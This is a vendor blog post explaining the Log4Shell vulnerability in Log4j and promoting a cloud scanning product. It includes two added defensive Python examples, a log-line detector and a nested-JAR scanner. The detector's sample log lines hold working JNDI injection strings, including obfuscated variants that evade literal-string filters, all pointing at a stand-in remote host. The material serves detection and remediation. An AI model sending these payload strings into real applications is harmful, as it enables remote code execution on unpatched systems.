Never Underestimate Your Enemy – A Guide to Log4j

Author

Rajneesh Kaul

Read Time

3 Minutes

Last Updated

Jun 19, 2023


What is Log4j, and how did it originate? 

An unpatched Log4j instance lets an attacker breach the system it runs on and, from there, widen the blast radius of the compromise.  

Log4j is an open-source Java logging framework that collects and aggregates records of a system’s activity. In July 2013 the Apache Log4j project received a feature request to add a lookup based on the Java Naming and Directory Interface (JNDI), the standard Java API for retrieving objects from directory services such as LDAP. The volunteer maintainers, short on resources and security expertise, merged the feature without a rigorous security review, and it shipped enabled by default in Log4j 2 (from 2.0-beta9 through 2.14.1), so every application that logged attacker-controlled text with those releases was exposed.  
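To show why the lookup is dangerous in practice: the substitution runs on the logged text itself, and nested lookups let an attacker hide the jndi: prefix from simple string matching. The following is an added example, not code from the original page or from the Log4j project. It emulates a small subset of Log4j 2's lookup rules in Python (the lower and upper lookups and the :-default fallback) and runs a detector over constructed access-log lines; all addresses and payloads are made up.

```python
"""Log4Shell probe detection over web-server log lines.

Added example, not code from the original page or from the Log4j project. It
emulates a small subset of Log4j 2's lookup substitution (the 'lower' and
'upper' lookups and the ':-default' fallback) so that obfuscated payloads can
be normalised before matching; lookups it does not model are left in place.
"""
import re

# innermost ${...}: contains no further '$', '{' or '}'
INNER = re.compile(r'\$\{([^${}]*)\}')
# unresolved lookups are parked behind this marker so the loop terminates
PARK = '\x00{'
JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)
NAIVE = re.compile(r'\$\{jndi:', re.IGNORECASE)   # what a literal-string WAF rule sees


def _resolve_one(expr):
    """Resolve the body of one ${...} whose inner lookups are already resolved."""
    prefix, _, rest = expr.partition(':')
    if prefix == 'lower':
        return rest.lower()
    if prefix == 'upper':
        return rest.upper()
    if ':-' in expr:                     # ${name:-default}, e.g. ${::-j} or ${env:NOPE:-j}
        return expr.split(':-', 1)[1]
    return PARK + expr + '}'             # jndi:, date:, etc.: not emulated, keep visible


def resolve(text):
    """Repeatedly substitute innermost lookups, then restore the parked ones."""
    while True:
        m = INNER.search(text)
        if m is None:
            break
        text = text[:m.start()] + _resolve_one(m.group(1)) + text[m.end():]
    return text.replace(PARK, '${')


def naive_match(line):
    """A literal-string rule, for comparison with the resolving detector."""
    return NAIVE.search(line) is not None


def find_probes(lines):
    """Return [(index, resolved_line)] for lines carrying a JNDI lookup after de-obfuscation."""
    hits = []
    for i, line in enumerate(lines):
        resolved = resolve(line)
        if JNDI.search(resolved):
            hits.append((i, resolved))
    return hits


# Constructed sample access-log lines (not real traffic); the User-Agent field is the carrier.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:dns://203.0.113.7/x}"',
]

if __name__ == '__main__':
    for i, resolved in find_probes(SAMPLE_LOG_LINES):
        status = 'hit' if naive_match(SAMPLE_LOG_LINES[i]) else 'MISSED'
        print(f'line {i}: literal rule {status} -> {resolved}')
```

A literal rule for the string ${jndi: catches only the second sample line; the resolving detector normalises the other three probes to the same form and flags all four. The emulation is deliberately partial (no date:, sys: or other lookups are modelled), so it is a triage aid for log review, not a substitute for patching.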


Is Log4j Still Relevant? 

Yes, absolutely. 

According to the Cybersecurity and Infrastructure Security Agency (CISA), threat actors continue to exploit the Log4Shell vulnerability (CVE-2021-44228) in unpatched VMware Horizon servers. Exploitation trends are hard to measure: many organizations do not understand the impact, do not know what evidence to collect, and reporting is voluntary. Developers have also embedded vulnerable copies of Log4j inside many software services, where standard scanners that only inventory top-level packages do not find them.  

Finding Log4j therefore needs tooling that scans deep into third-party libraries, including JARs nested inside other JARs. State and national governments worldwide use Log4j in critical infrastructure applications, yet the Log4j and ASF teams have no visibility into who uses the framework or how it enters an application’s build. Exploitation is cheap: an attacker only needs to get a crafted lookup string into any field that the application logs, and the resulting remote code execution runs with the privileges of the Java process, which in practice often means complete control of the compromised system. 
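The following is an added example of the kind of deep scan the paragraph above calls for; it is not code from the original page or from any vendor product. It walks a JAR and every JAR nested inside it, recognises a Log4j 2 copy by its JndiLookup class (matched by path suffix so that shaded, relocated copies are caught too), reads the version from the manifest or the file name, and reports the remediation state. The fat JAR it scans is constructed in memory for the demonstration, with placeholder bytes in place of real class files, and the version thresholds assume the Java 8+ Log4j 2.x line (the 2.12.x and 2.3.x backport branches have their own fixed versions and are not modelled).

```python
"""Find embedded Log4j 2 copies inside nested JARs.

Added example, not part of the original page or any vendor product. Shows why a
scanner that only lists top-level packages misses Log4j bundled inside fat/uber
JARs or shaded into a third-party library. Assumes the Java 8+ Log4j 2.x line;
the 2.12.x / 2.3.x backport branches have their own fixed versions.
"""
import io
import re
import zipfile

ARCHIVE_SUFFIXES = ('.jar', '.war', '.ear', '.zip')
JNDI_CLASS = 'org/apache/logging/log4j/core/lookup/JndiLookup.class'
VERSION_IN_NAME = re.compile(r'log4j-core-(\d+(?:\.\d+)+)')


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); None when no dotted version is present."""
    m = re.search(r'(\d+(?:\.\d+)+)', text or '')
    return tuple(int(p) for p in m.group(1).split('.')) if m else None


def classify(version):
    """Map a Log4j 2 version tuple to the remediation state a security team cares about."""
    if version is None:
        return 'unknown version: manual review'
    if version < (2, 15, 0):
        return 'vulnerable to CVE-2021-44228 (Log4Shell)'
    if version < (2, 17, 1):
        return 'fixed for Log4Shell but missing later Log4j 2.x fixes: upgrade'
    return 'patched'


def manifest_version(zf):
    """Read Implementation-Version from META-INF/MANIFEST.MF, if the archive has one."""
    try:
        manifest = zf.read('META-INF/MANIFEST.MF').decode('utf-8', 'replace')
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith('Implementation-Version:'):
            return parse_version(line.split(':', 1)[1])
    return None


def scan_archive(data, path):
    """Recursively scan archive bytes; returns [(path_chain, version, state), ...].
    A copy whose JndiLookup.class was deleted (the documented class-removal
    mitigation) is intentionally not reported."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if any(n.endswith('lookup/JndiLookup.class') for n in names):
            version = manifest_version(zf)
            if version is None:                      # fall back to the file name
                m = VERSION_IN_NAME.search(path)
                version = parse_version(m.group(1)) if m else None
            findings.append((path, version, classify(version)))
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(scan_archive(zf.read(name), path + '!' + name))
    return findings


def scan_file(filename):
    with open(filename, 'rb') as f:
        return scan_archive(f.read(), filename)


def build_sample_fat_jar():
    """Construct, in memory, a Spring-Boot-style fat JAR with three embedded Log4j copies.
    Constructed test data, not a real artifact; class files are placeholder bytes."""
    def jar(entries):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, 'w') as zf:
            for name, content in entries.items():
                zf.writestr(name, content)
        return buf.getvalue()

    old_log4j = jar({'META-INF/MANIFEST.MF': 'Manifest-Version: 1.0\r\nImplementation-Version: 2.14.1\r\n',
                     JNDI_CLASS: b'\xca\xfe\xba\xbe'})
    patched_log4j = jar({'META-INF/MANIFEST.MF': 'Manifest-Version: 1.0\r\nImplementation-Version: 2.17.1\r\n',
                         JNDI_CLASS: b'\xca\xfe\xba\xbe'})   # class still ships in patched releases
    # third-party library that shaded Log4j into its own package and carries no Log4j
    # version in its manifest or file name: only the relocated class path gives it away
    shaded_lib = jar({'META-INF/MANIFEST.MF': 'Manifest-Version: 1.0\r\n',
                      'com/example/shaded/' + JNDI_CLASS: b'\xca\xfe\xba\xbe'})
    return jar({'BOOT-INF/classes/application.properties': 'x=1',
                'BOOT-INF/lib/log4j-core-2.14.1.jar': old_log4j,
                'BOOT-INF/lib/log4j-core-2.17.1.jar': patched_log4j,
                'BOOT-INF/lib/vendor-sdk-3.2.jar': shaded_lib})


if __name__ == '__main__':
    for chain, version, state in scan_archive(build_sample_fat_jar(), 'app.jar'):
        print(f'{chain}: log4j-core {version or "?"} -> {state}')
```

Against the constructed fat JAR the scan reports the 2.14.1 copy as vulnerable, the 2.17.1 copy as patched, and the shaded vendor SDK as an unknown version needing manual review; a top-level package inventory would have listed only the outer application JAR. Run scan_file on real artifacts to walk them from disk.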

How secure are organizations currently against Log4j? 

Enterprises that had completed a full security review proactively patched any vulnerable systems. Their security teams had dedicated resources that understood where Log4j was used, through a Software Bill of Materials (SBOM) produced before Log4j was integrated into application development or procurement. The SBOM helped these enterprises assess the risk faster and mobilize resources to patch systems while minimizing gaps in their security posture.  

Most organizations to date still lack a robust security strategy that starts from an understanding of their current software inventory and the extent of their exposure through Log4j. Once they do learn the size of the exposure, they are often unclear about the trade-off between patching immediately and the impact of patching on their existing operations.  

What Can We Do for Your Company About Log4j? 

Xcloud platform’s ChainScanTM capability runs a deep scan of third-party libraries to find and highlight hidden vulnerabilities such as embedded copies of Log4j. It maps the dependencies throughout the application software supply chain and suggests remediation through software patches or policy enforcement.  

Xcloud, an end-to-end cloud security solution, onboards customers that have adopted or plan to adopt a multi-cloud strategy. It gives customers complete visibility into their virtual machines and containers. The platform provides both CWPP and CSPM capabilities, which are needed to meet internal security and external regulatory requirements at both the infrastructure and the application level.    

Security teams can deploy Xcloud as an agentless technology that uses the public cloud provider’s APIs to scan applications and infrastructure without impacting operations. Once Xcloud has examined the cloud-hosted applications and infrastructure, it provides a detailed inventory of the software libraries in use and prioritizes the known vulnerabilities, misconfigurations, and malware in your cloud environment.  

Our deep scan capability ensures Xcloud finds hidden vulnerabilities and recommends remediation measures to security teams. Additionally, the ease of onboarding helps developers understand the cloud security posture themselves, reducing their dependency on security teams during application development and deployment.